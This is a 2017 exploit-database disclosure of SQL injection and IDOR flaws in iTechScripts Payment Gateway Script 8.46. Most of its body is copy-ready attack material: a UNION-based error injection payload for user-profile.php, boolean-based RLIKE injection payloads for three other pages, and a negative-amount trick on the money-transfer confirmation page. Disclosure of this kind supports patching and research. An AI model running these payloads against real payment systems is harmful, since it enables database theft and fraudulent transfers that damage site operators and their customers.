iTechScripts Payment Gateway Script 8.46 SQL Injection

2017.01.19
Credit: Hasan Emre Ozer
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

Exploit Title : Payment Gateway Script v8.46 - Multiple Vulnerability Author : Hasan Emre Ozer Google Dork : - Date : 18/01/2017 Type : webapps Platform: PHP Vendor Homepage : http://itechscripts.com/payment-gateway-script/ <http://itechscripts.com/image-sharing-script/> Sofware Price and Demo : $400 http://payment-gateway.itechscripts.com <http://photo-sharing.itechscripts.com/> ------------------------------------------------------ Type: Error Based Sql Injection Vulnerable URL:http://localhost/[PATH]/user-profile.php Vulnerable Parameters: token Method: GET Payload: -3519' UNION ALL SELECT NULL,NULL,CONCAT(0x7170767871,0x6850685261566a4d586d544e68636d7458684a7943657a70704f697a6767734c4c50654b495a5770,0x716a7a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# ------------------------------------------------------ Type: IDOR Vulnerable URL: http://localhost/[PATH]/send-money-confirm.php Vulnerable Parameters: t_amount and t_paid Method: POST Payload: negative money value (ps:-1350) ------------------------------------------------------ Type: Boolean Based Sql Injection Vulnerable URL:http://localhost/[PATH]/netbank_historyDetails.php Vulnerable Parameters: token Method: GET Payload: ' RLIKE (SELECT (CASE WHEN (6762=6762) THEN 0x343034306334636134323338613062393233383230646363353039613666373538343962 ELSE 0x28 END))-- BxvH ------------------------------------------------------ Type: Boolean Based Sql Injection Vulnerable URL:http://localhost/[PATH]/netbank_histPrew.php Vulnerable Parameters: token Method: GET Payload: ' RLIKE (SELECT (CASE WHEN (6762=6762) THEN 0x343034306334636134323338613062393233383230646363353039613666373538343962 ELSE 0x28 END))-- BxvH ------------------------------------------------------ Type: Boolean Based Sql Injection Vulnerable URL:http://localhost/[PATH]/overview.php Vulnerable Parameters: limit Method: GET Payload: ' RLIKE (SELECT (CASE WHEN (6762=6762) THEN 0x343034306334636134323338613062393233383230646363353039613666373538343962 ELSE 0x28 END))-- BxvH -- Best Regards, Hasan Emre


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top